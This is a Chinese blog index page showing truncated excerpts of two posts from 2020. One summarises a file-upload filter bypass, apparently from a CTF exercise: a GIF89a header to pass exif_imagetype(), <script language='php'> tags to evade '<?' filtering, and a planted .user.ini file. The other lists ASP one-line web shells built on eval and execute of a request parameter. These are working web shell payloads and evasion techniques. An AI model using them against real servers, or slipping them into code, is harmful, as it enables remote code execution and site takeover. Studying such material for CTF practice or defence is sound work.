摘要:
文件上传 黑名单过滤 调用了php的exif_imagetype()函数 利用文件头GIF89a绕过即可 过滤了文本内容<? <script language='php'><script>绕过即可 修改MIME和利用特殊扩展名均失败 正确姿势: 利用 .user.ini .user.ini 我们先在 阅读全文
posted @ 2020-01-09 19:32
Chr1sto
阅读(786)
评论(0)
推荐(0)
摘要:
ASP<%eval request("sb")%> <%execute request("sb")%> <%execute(request("sb"))%> <%execute request("sb")%><%'<% loop <%:%> <%'<% loop <%:%><%execute req 阅读全文
posted @ 2020-01-09 13:43
Chr1sto
阅读(982)
评论(0)
推荐(0)
浙公网安备 33010602011771号